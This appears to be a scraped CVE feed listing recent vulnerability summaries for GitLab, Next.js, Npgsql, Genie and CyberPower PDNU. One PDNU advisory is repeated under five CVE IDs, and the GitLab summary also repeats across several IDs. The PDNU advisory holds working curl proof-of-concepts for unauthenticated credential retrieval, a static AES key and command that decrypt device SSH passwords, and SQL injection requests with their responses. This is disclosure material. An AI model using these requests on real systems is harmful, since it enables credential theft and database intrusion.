Newest CVEs

CVE-2024-34360Nodes can publish ATXs which reference the incorrect previous ATX of the Smesher that created the ATX. ATXs are expected to form a single chain from the newest to the first ATX ever published by an identity. Allowing Smeshers to reference an earlier (but not the latest) ATX as previous breaks this protocol rule and can serve as an attack vector where Nodes are rewarded for holding their PoST data for less than one epoch but still being eligible for rewards.
CVE-2024-34349There is a possibility to execute javascript code in the Admin panel. In order to perform an XSS attack input a script into Name field in which of the resources: Taxons, Products, Product Options or Product Variants. The code will be executed while using an autocomplete field with one of the listed entities in the Admin Panel. Also for the taxons in the category tree on the product form.
CVE-2024-32964SSRF ,All users will be impacted.
CVE-2024-32739CVE-2024-32735 - Missing Authentication for Critical Function (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)An unauthenticated remote attacker can access the PDNU REST APIs. For example, the attacker can fetch sensitive information (i.e., login credentials) for devices managed by PDNU:curl '<http://<target-host>>:8085/api/v1/devices' {"status":"success","results":[{"ip":"","mac":"11:22:33:44:55:66","fwversion":null,"netmask":"","gateway":" \"\"","usedhcp":false,"location":null,"name":null,"uptime":null,"code":null,"contact":null,"modifiedtime":null,"account":"admin","passwd":"FDA64FBAD708BA5A3CA9995A1153F4C6","iv":"90CC43284178CF848AA3CFE8C98B337C","canconn":true,"action":null,"ndtype":2}]}The encrypted password used to login (i.e., SSH) to a device can be decrypted with a static key (i.e., 7ea3312f320c78447ff6fd4c51f77a8abb764b20e31aedccfe6b1854f5aa505e):echo -n 'FDA64FBAD708BA5A3CA9995A1153F4C6' | xxd -p -r | openssl aes-256-cbc -d -K 7ea3312f320c78447ff6fd4c51f77a8abb764b20e31aedccfe6b1854f5aa505e -iv 90CC43284178CF848AA3CFE8C98B337C Password123Note that we do not a CyberPower device to be added to PDNU.  We simulate "adding a device manually" with:a. Add a row to the devicesecret table in mcu.dbcurl -i -X PUT -H 'Content-Type:application/json' -d '{"ip":"","mac":"11:22:33:44:55:66","cmd":"submit_after_dry_run","acc":"admin","passwd":"Password123","connectionstatus":true}' "<http://<target-host>>:8085/api/v1/devices"b. Using the PDNU web UI, import a file with the following content, this would add a row to the rmcdevice table"Deivce Type","MAC Address","Version","Account","IP Address","DHCP","Time","Result","Up Time","Name","Location","Subnet Mask","Gateway" "2","11:22:33:44:55:66","","","","false", "1545027013","101","1348247500","PDU30SWT17ATNET","Server Room","", "" CVE-2024-32736 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_utask_verbose (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public UpdateVerboseStatusResp query_utask_verbose(String contract_uuid) throws DataAccessException { String q_str = String.format("select uaction, ip, mac, ts, reasoningcode from ucontract join utask on ucontract.ucid = utask.contract join utaskresult on utask.utid = utaskresult.task where ucontract.ucid = '%s';", new Object[] { contract_uuid }); return (UpdateVerboseStatusResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:# sqlite_version() = 3.21.0 curl "<http://<target-host>>:8085/api/v1/confup?mode=&uid=1'%20UNION%20select%201,2,3,4,sqlite_version();--" {"status":"finished","results":[{"ip":"2","mac":"3","action":"1","ts":"4","code":"3.21.0"}]}CVE-2024-32737 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_contract_result (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public synchronized UpdateLeanStatusResp query_contract_result(String contract_uuid) throws DataAccessException { String q_str = String.format("select numofupgradedevice, numsuccess, numfailed, modifiedtime from ucontractresult where ucontractresult.contract = '%s';", new Object[] { contract_uuid }); return (UpdateLeanStatusResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","result":{"processing":-4,"success":2,"failed":3,"modifiedtime":"3.21.0"}}CVE-2024-32738 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_ptask_lean (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public PdncConfigLeanResp query_ptask_lean(String contract_uuid) throws DataAccessException { String q_str = String.format("select numofdevice, numsuccess, numfailed, modifiedtime from pcontractresult where contract = '%s';", new Object[] { contract_uuid }); return (PdncConfigLeanResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/ndconfig?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","results":[{"processing":-4,"success":2,"failed":3,"modifiedtime":"3.21.0"}]}CVE-2024-32739 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_ptask_verbose (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public PdncConfigVerboseResp query_ptask_verbose(String contract_uuid) throws DataAccessException { String q_str = String.format("select paction, ip, ts, reasoningcode from pcontract join ptask on pcontract.pcid = ptask.contract join ptaskresult on ptask.ptid = ptaskresult.task where pcontract.pcid = '%s';", new Object[] { contract_uuid }); return (PdncConfigVerboseResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/ndconfig?mode=&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","results":[{"code":"3.21.0","action":"1","ip":"2","ts":"3"}]} 
CVE-2024-32738CVE-2024-32735 - Missing Authentication for Critical Function (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)An unauthenticated remote attacker can access the PDNU REST APIs. For example, the attacker can fetch sensitive information (i.e., login credentials) for devices managed by PDNU:curl '<http://<target-host>>:8085/api/v1/devices' {"status":"success","results":[{"ip":"","mac":"11:22:33:44:55:66","fwversion":null,"netmask":"","gateway":" \"\"","usedhcp":false,"location":null,"name":null,"uptime":null,"code":null,"contact":null,"modifiedtime":null,"account":"admin","passwd":"FDA64FBAD708BA5A3CA9995A1153F4C6","iv":"90CC43284178CF848AA3CFE8C98B337C","canconn":true,"action":null,"ndtype":2}]}The encrypted password used to login (i.e., SSH) to a device can be decrypted with a static key (i.e., 7ea3312f320c78447ff6fd4c51f77a8abb764b20e31aedccfe6b1854f5aa505e):echo -n 'FDA64FBAD708BA5A3CA9995A1153F4C6' | xxd -p -r | openssl aes-256-cbc -d -K 7ea3312f320c78447ff6fd4c51f77a8abb764b20e31aedccfe6b1854f5aa505e -iv 90CC43284178CF848AA3CFE8C98B337C Password123Note that we do not a CyberPower device to be added to PDNU.  We simulate "adding a device manually" with:a. Add a row to the devicesecret table in mcu.dbcurl -i -X PUT -H 'Content-Type:application/json' -d '{"ip":"","mac":"11:22:33:44:55:66","cmd":"submit_after_dry_run","acc":"admin","passwd":"Password123","connectionstatus":true}' "<http://<target-host>>:8085/api/v1/devices"b. Using the PDNU web UI, import a file with the following content, this would add a row to the rmcdevice table"Deivce Type","MAC Address","Version","Account","IP Address","DHCP","Time","Result","Up Time","Name","Location","Subnet Mask","Gateway" "2","11:22:33:44:55:66","","","","false", "1545027013","101","1348247500","PDU30SWT17ATNET","Server Room","", "" CVE-2024-32736 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_utask_verbose (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public UpdateVerboseStatusResp query_utask_verbose(String contract_uuid) throws DataAccessException { String q_str = String.format("select uaction, ip, mac, ts, reasoningcode from ucontract join utask on ucontract.ucid = utask.contract join utaskresult on utask.utid = utaskresult.task where ucontract.ucid = '%s';", new Object[] { contract_uuid }); return (UpdateVerboseStatusResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:# sqlite_version() = 3.21.0 curl "<http://<target-host>>:8085/api/v1/confup?mode=&uid=1'%20UNION%20select%201,2,3,4,sqlite_version();--" {"status":"finished","results":[{"ip":"2","mac":"3","action":"1","ts":"4","code":"3.21.0"}]}CVE-2024-32737 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_contract_result (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public synchronized UpdateLeanStatusResp query_contract_result(String contract_uuid) throws DataAccessException { String q_str = String.format("select numofupgradedevice, numsuccess, numfailed, modifiedtime from ucontractresult where ucontractresult.contract = '%s';", new Object[] { contract_uuid }); return (UpdateLeanStatusResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","result":{"processing":-4,"success":2,"failed":3,"modifiedtime":"3.21.0"}}CVE-2024-32738 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_ptask_lean (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public PdncConfigLeanResp query_ptask_lean(String contract_uuid) throws DataAccessException { String q_str = String.format("select numofdevice, numsuccess, numfailed, modifiedtime from pcontractresult where contract = '%s';", new Object[] { contract_uuid }); return (PdncConfigLeanResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/ndconfig?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","results":[{"processing":-4,"success":2,"failed":3,"modifiedtime":"3.21.0"}]}CVE-2024-32739 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_ptask_verbose (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public PdncConfigVerboseResp query_ptask_verbose(String contract_uuid) throws DataAccessException { String q_str = String.format("select paction, ip, ts, reasoningcode from pcontract join ptask on pcontract.pcid = ptask.contract join ptaskresult on ptask.ptid = ptaskresult.task where pcontract.pcid = '%s';", new Object[] { contract_uuid }); return (PdncConfigVerboseResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/ndconfig?mode=&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","results":[{"code":"3.21.0","action":"1","ip":"2","ts":"3"}]} 
CVE-2024-32737CVE-2024-32735 - Missing Authentication for Critical Function (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)An unauthenticated remote attacker can access the PDNU REST APIs. For example, the attacker can fetch sensitive information (i.e., login credentials) for devices managed by PDNU:curl '<http://<target-host>>:8085/api/v1/devices' {"status":"success","results":[{"ip":"","mac":"11:22:33:44:55:66","fwversion":null,"netmask":"","gateway":" \"\"","usedhcp":false,"location":null,"name":null,"uptime":null,"code":null,"contact":null,"modifiedtime":null,"account":"admin","passwd":"FDA64FBAD708BA5A3CA9995A1153F4C6","iv":"90CC43284178CF848AA3CFE8C98B337C","canconn":true,"action":null,"ndtype":2}]}The encrypted password used to login (i.e., SSH) to a device can be decrypted with a static key (i.e., 7ea3312f320c78447ff6fd4c51f77a8abb764b20e31aedccfe6b1854f5aa505e):echo -n 'FDA64FBAD708BA5A3CA9995A1153F4C6' | xxd -p -r | openssl aes-256-cbc -d -K 7ea3312f320c78447ff6fd4c51f77a8abb764b20e31aedccfe6b1854f5aa505e -iv 90CC43284178CF848AA3CFE8C98B337C Password123Note that we do not a CyberPower device to be added to PDNU.  We simulate "adding a device manually" with:a. Add a row to the devicesecret table in mcu.dbcurl -i -X PUT -H 'Content-Type:application/json' -d '{"ip":"","mac":"11:22:33:44:55:66","cmd":"submit_after_dry_run","acc":"admin","passwd":"Password123","connectionstatus":true}' "<http://<target-host>>:8085/api/v1/devices"b. Using the PDNU web UI, import a file with the following content, this would add a row to the rmcdevice table"Deivce Type","MAC Address","Version","Account","IP Address","DHCP","Time","Result","Up Time","Name","Location","Subnet Mask","Gateway" "2","11:22:33:44:55:66","","","","false", "1545027013","101","1348247500","PDU30SWT17ATNET","Server Room","", "" CVE-2024-32736 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_utask_verbose (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public UpdateVerboseStatusResp query_utask_verbose(String contract_uuid) throws DataAccessException { String q_str = String.format("select uaction, ip, mac, ts, reasoningcode from ucontract join utask on ucontract.ucid = utask.contract join utaskresult on utask.utid = utaskresult.task where ucontract.ucid = '%s';", new Object[] { contract_uuid }); return (UpdateVerboseStatusResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:# sqlite_version() = 3.21.0 curl "<http://<target-host>>:8085/api/v1/confup?mode=&uid=1'%20UNION%20select%201,2,3,4,sqlite_version();--" {"status":"finished","results":[{"ip":"2","mac":"3","action":"1","ts":"4","code":"3.21.0"}]}CVE-2024-32737 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_contract_result (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public synchronized UpdateLeanStatusResp query_contract_result(String contract_uuid) throws DataAccessException { String q_str = String.format("select numofupgradedevice, numsuccess, numfailed, modifiedtime from ucontractresult where ucontractresult.contract = '%s';", new Object[] { contract_uuid }); return (UpdateLeanStatusResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","result":{"processing":-4,"success":2,"failed":3,"modifiedtime":"3.21.0"}}CVE-2024-32738 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_ptask_lean (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public PdncConfigLeanResp query_ptask_lean(String contract_uuid) throws DataAccessException { String q_str = String.format("select numofdevice, numsuccess, numfailed, modifiedtime from pcontractresult where contract = '%s';", new Object[] { contract_uuid }); return (PdncConfigLeanResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/ndconfig?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","results":[{"processing":-4,"success":2,"failed":3,"modifiedtime":"3.21.0"}]}CVE-2024-32739 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_ptask_verbose (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public PdncConfigVerboseResp query_ptask_verbose(String contract_uuid) throws DataAccessException { String q_str = String.format("select paction, ip, ts, reasoningcode from pcontract join ptask on pcontract.pcid = ptask.contract join ptaskresult on ptask.ptid = ptaskresult.task where pcontract.pcid = '%s';", new Object[] { contract_uuid }); return (PdncConfigVerboseResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/ndconfig?mode=&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","results":[{"code":"3.21.0","action":"1","ip":"2","ts":"3"}]} 
CVE-2024-32736CVE-2024-32735 - Missing Authentication for Critical Function (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)An unauthenticated remote attacker can access the PDNU REST APIs. For example, the attacker can fetch sensitive information (i.e., login credentials) for devices managed by PDNU:curl '<http://<target-host>>:8085/api/v1/devices' {"status":"success","results":[{"ip":"","mac":"11:22:33:44:55:66","fwversion":null,"netmask":"","gateway":" \"\"","usedhcp":false,"location":null,"name":null,"uptime":null,"code":null,"contact":null,"modifiedtime":null,"account":"admin","passwd":"FDA64FBAD708BA5A3CA9995A1153F4C6","iv":"90CC43284178CF848AA3CFE8C98B337C","canconn":true,"action":null,"ndtype":2}]}The encrypted password used to login (i.e., SSH) to a device can be decrypted with a static key (i.e., 7ea3312f320c78447ff6fd4c51f77a8abb764b20e31aedccfe6b1854f5aa505e):echo -n 'FDA64FBAD708BA5A3CA9995A1153F4C6' | xxd -p -r | openssl aes-256-cbc -d -K 7ea3312f320c78447ff6fd4c51f77a8abb764b20e31aedccfe6b1854f5aa505e -iv 90CC43284178CF848AA3CFE8C98B337C Password123Note that we do not a CyberPower device to be added to PDNU.  We simulate "adding a device manually" with:a. Add a row to the devicesecret table in mcu.dbcurl -i -X PUT -H 'Content-Type:application/json' -d '{"ip":"","mac":"11:22:33:44:55:66","cmd":"submit_after_dry_run","acc":"admin","passwd":"Password123","connectionstatus":true}' "<http://<target-host>>:8085/api/v1/devices"b. Using the PDNU web UI, import a file with the following content, this would add a row to the rmcdevice table"Deivce Type","MAC Address","Version","Account","IP Address","DHCP","Time","Result","Up Time","Name","Location","Subnet Mask","Gateway" "2","11:22:33:44:55:66","","","","false", "1545027013","101","1348247500","PDU30SWT17ATNET","Server Room","", "" CVE-2024-32736 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_utask_verbose (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public UpdateVerboseStatusResp query_utask_verbose(String contract_uuid) throws DataAccessException { String q_str = String.format("select uaction, ip, mac, ts, reasoningcode from ucontract join utask on ucontract.ucid = utask.contract join utaskresult on utask.utid = utaskresult.task where ucontract.ucid = '%s';", new Object[] { contract_uuid }); return (UpdateVerboseStatusResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:# sqlite_version() = 3.21.0 curl "<http://<target-host>>:8085/api/v1/confup?mode=&uid=1'%20UNION%20select%201,2,3,4,sqlite_version();--" {"status":"finished","results":[{"ip":"2","mac":"3","action":"1","ts":"4","code":"3.21.0"}]}CVE-2024-32737 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_contract_result (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public synchronized UpdateLeanStatusResp query_contract_result(String contract_uuid) throws DataAccessException { String q_str = String.format("select numofupgradedevice, numsuccess, numfailed, modifiedtime from ucontractresult where ucontractresult.contract = '%s';", new Object[] { contract_uuid }); return (UpdateLeanStatusResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","result":{"processing":-4,"success":2,"failed":3,"modifiedtime":"3.21.0"}}CVE-2024-32738 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_ptask_lean (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public PdncConfigLeanResp query_ptask_lean(String contract_uuid) throws DataAccessException { String q_str = String.format("select numofdevice, numsuccess, numfailed, modifiedtime from pcontractresult where contract = '%s';", new Object[] { contract_uuid }); return (PdncConfigLeanResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/ndconfig?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","results":[{"processing":-4,"success":2,"failed":3,"modifiedtime":"3.21.0"}]}CVE-2024-32739 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_ptask_verbose (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public PdncConfigVerboseResp query_ptask_verbose(String contract_uuid) throws DataAccessException { String q_str = String.format("select paction, ip, ts, reasoningcode from pcontract join ptask on pcontract.pcid = ptask.contract join ptaskresult on ptask.ptid = ptaskresult.task where pcontract.pcid = '%s';", new Object[] { contract_uuid }); return (PdncConfigVerboseResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/ndconfig?mode=&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","results":[{"code":"3.21.0","action":"1","ip":"2","ts":"3"}]} 
CVE-2024-32735CVE-2024-32735 - Missing Authentication for Critical Function (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H)An unauthenticated remote attacker can access the PDNU REST APIs. For example, the attacker can fetch sensitive information (i.e., login credentials) for devices managed by PDNU:curl '<http://<target-host>>:8085/api/v1/devices' {"status":"success","results":[{"ip":"","mac":"11:22:33:44:55:66","fwversion":null,"netmask":"","gateway":" \"\"","usedhcp":false,"location":null,"name":null,"uptime":null,"code":null,"contact":null,"modifiedtime":null,"account":"admin","passwd":"FDA64FBAD708BA5A3CA9995A1153F4C6","iv":"90CC43284178CF848AA3CFE8C98B337C","canconn":true,"action":null,"ndtype":2}]}The encrypted password used to login (i.e., SSH) to a device can be decrypted with a static key (i.e., 7ea3312f320c78447ff6fd4c51f77a8abb764b20e31aedccfe6b1854f5aa505e):echo -n 'FDA64FBAD708BA5A3CA9995A1153F4C6' | xxd -p -r | openssl aes-256-cbc -d -K 7ea3312f320c78447ff6fd4c51f77a8abb764b20e31aedccfe6b1854f5aa505e -iv 90CC43284178CF848AA3CFE8C98B337C Password123Note that we do not a CyberPower device to be added to PDNU.  We simulate "adding a device manually" with:a. Add a row to the devicesecret table in mcu.dbcurl -i -X PUT -H 'Content-Type:application/json' -d '{"ip":"","mac":"11:22:33:44:55:66","cmd":"submit_after_dry_run","acc":"admin","passwd":"Password123","connectionstatus":true}' "<http://<target-host>>:8085/api/v1/devices"b. Using the PDNU web UI, import a file with the following content, this would add a row to the rmcdevice table"Deivce Type","MAC Address","Version","Account","IP Address","DHCP","Time","Result","Up Time","Name","Location","Subnet Mask","Gateway" "2","11:22:33:44:55:66","","","","false", "1545027013","101","1348247500","PDU30SWT17ATNET","Server Room","", "" CVE-2024-32736 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_utask_verbose (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public UpdateVerboseStatusResp query_utask_verbose(String contract_uuid) throws DataAccessException { String q_str = String.format("select uaction, ip, mac, ts, reasoningcode from ucontract join utask on ucontract.ucid = utask.contract join utaskresult on utask.utid = utaskresult.task where ucontract.ucid = '%s';", new Object[] { contract_uuid }); return (UpdateVerboseStatusResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:# sqlite_version() = 3.21.0 curl "<http://<target-host>>:8085/api/v1/confup?mode=&uid=1'%20UNION%20select%201,2,3,4,sqlite_version();--" {"status":"finished","results":[{"ip":"2","mac":"3","action":"1","ts":"4","code":"3.21.0"}]}CVE-2024-32737 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_contract_result (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public synchronized UpdateLeanStatusResp query_contract_result(String contract_uuid) throws DataAccessException { String q_str = String.format("select numofupgradedevice, numsuccess, numfailed, modifiedtime from ucontractresult where ucontractresult.contract = '%s';", new Object[] { contract_uuid }); return (UpdateLeanStatusResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/confup?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","result":{"processing":-4,"success":2,"failed":3,"modifiedtime":"3.21.0"}}CVE-2024-32738 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_ptask_lean (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public PdncConfigLeanResp query_ptask_lean(String contract_uuid) throws DataAccessException { String q_str = String.format("select numofdevice, numsuccess, numfailed, modifiedtime from pcontractresult where contract = '%s';", new Object[] { contract_uuid }); return (PdncConfigLeanResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/ndconfig?mode=lean&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","results":[{"processing":-4,"success":2,"failed":3,"modifiedtime":"3.21.0"}]}CVE-2024-32739 - SQLi in mcu.jar!com.cyberpower.mcu.core.persist.MCUDBHelper.query_ptask_verbose (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N)SQLi via user-supplied parameter contract_uuid: public PdncConfigVerboseResp query_ptask_verbose(String contract_uuid) throws DataAccessException { String q_str = String.format("select paction, ip, ts, reasoningcode from pcontract join ptask on pcontract.pcid = ptask.contract join ptaskresult on ptask.ptid = ptaskresult.task where pcontract.pcid = '%s';", new Object[] { contract_uuid }); return (PdncConfigVerboseResp)this.jdbcTemplate.query(q_str, (ResultSetExtractor)new Object(this)); }PoC:curl "<http://<target-host>>:8085/api/v1/ndconfig?mode=&uid=1'%20UNION%20select%201,2,3,sqlite_version();--" {"status":"finished","results":[{"code":"3.21.0","action":"1","ip":"2","ts":"3"}]} 
CVE-2024-2454Uncontrolled Resource Consumption in GitLab
CVE-2024-2651Uncontrolled Resource Consumption in GitLab
CVE-2024-4597Cross-Site Request Forgery (CSRF) in GitLab
CVE-2024-4701Any Genie OSS users running their own instance and relying on the filesystem to store file attachments submitted to the Genie application may be impacted. Using this technique, it is possible to write a file with any user-specified filename and file contents to any location on the file system that the Java process has write access - potentially leading to remote code execution (RCE). Genie users who do not store these attachments locally on the underlying file system are not vulnerable to this issue.
CVE-2024-4671Use after free in Visuals.
CVE-2024-4539Gitlab reports: ReDoS in branch search when using wildcards ReDoS in markdown render pipeline Redos on Discord integrations Redos on Google Chat Integration Denial of Service Attack via Pin Menu DoS by filtering tags and branches via the API MR approval via CSRF in SAML SSO Banned user from groups can read issues updates via the api Require confirmation before linking JWT identity View confidential issues title and description of any public project via export SSRF via Github importer
CVE-2024-3976Gitlab reports: ReDoS in branch search when using wildcards ReDoS in markdown render pipeline Redos on Discord integrations Redos on Google Chat Integration Denial of Service Attack via Pin Menu DoS by filtering tags and branches via the API MR approval via CSRF in SAML SSO Banned user from groups can read issues updates via the api Require confirmation before linking JWT identity View confidential issues title and description of any public project via export SSRF via Github importer
CVE-2024-34352The ability to write arbitrary files on the host where the service is deployed can lead to a host takeover
CVE-2024-34351A Server-Side Request Forgery (SSRF) vulnerability was identified in Next.js Server Actions by security researchers at Assetnote. If the Host header is modified, and the below conditions are also met, an attacker may be able to make requests that appear to be originating from the Next.js application server itself. * Many hosting providers (including Vercel) route requests based on the Host header, so we do not believe that this vulnerability affects any Next.js applications where routing is done in this manner.
CVE-2024-34350Inconsistent interpretation of a crafted HTTP request meant that requests are treated as both a single request, and two separate requests by Next.js, leading to desynchronized responses. This led to a response queue poisoning vulnerability in the affected Next.js versions. For a request to be exploitable, the affected route also had to be making use of the rewrites feature in Next.js.
CVE-2024-32655Attackers can issue arbitrary SQL statements to the database on behalf of the application. The final impact depends on the application that uses Npgsql, the data it stores in Postgres, etc.
CVE-2024-2878Gitlab reports: ReDoS in branch search when using wildcards ReDoS in markdown render pipeline Redos on Discord integrations Redos on Google Chat Integration Denial of Service Attack via Pin Menu DoS by filtering tags and branches via the API MR approval via CSRF in SAML SSO Banned user from groups can read issues updates via the api Require confirmation before linking JWT identity View confidential issues title and description of any public project via export SSRF via Github importer
CVE-2024-1539Gitlab reports: ReDoS in branch search when using wildcards ReDoS in markdown render pipeline Redos on Discord integrations Redos on Google Chat Integration Denial of Service Attack via Pin Menu DoS by filtering tags and branches via the API MR approval via CSRF in SAML SSO Banned user from groups can read issues updates via the api Require confirmation before linking JWT identity View confidential issues title and description of any public project via export SSRF via Github importer
CVE-2024-1211Gitlab reports: ReDoS in branch search when using wildcards ReDoS in markdown render pipeline Redos on Discord integrations Redos on Google Chat Integration Denial of Service Attack via Pin Menu DoS by filtering tags and branches via the API MR approval via CSRF in SAML SSO Banned user from groups can read issues updates via the api Require confirmation before linking JWT identity View confidential issues title and description of any public project via export SSRF via Github importer
CVE-2023-6688Gitlab reports: ReDoS in branch search when using wildcards ReDoS in markdown render pipeline Redos on Discord integrations Redos on Google Chat Integration Denial of Service Attack via Pin Menu DoS by filtering tags and branches via the API MR approval via CSRF in SAML SSO Banned user from groups can read issues updates via the api Require confirmation before linking JWT identity View confidential issues title and description of any public project via export SSRF via Github importer
CVE-2023-6682Gitlab reports: ReDoS in branch search when using wildcards ReDoS in markdown render pipeline Redos on Discord integrations Redos on Google Chat Integration Denial of Service Attack via Pin Menu DoS by filtering tags and branches via the API MR approval via CSRF in SAML SSO Banned user from groups can read issues updates via the api Require confirmation before linking JWT identity View confidential issues title and description of any public project via export SSRF via Github importer
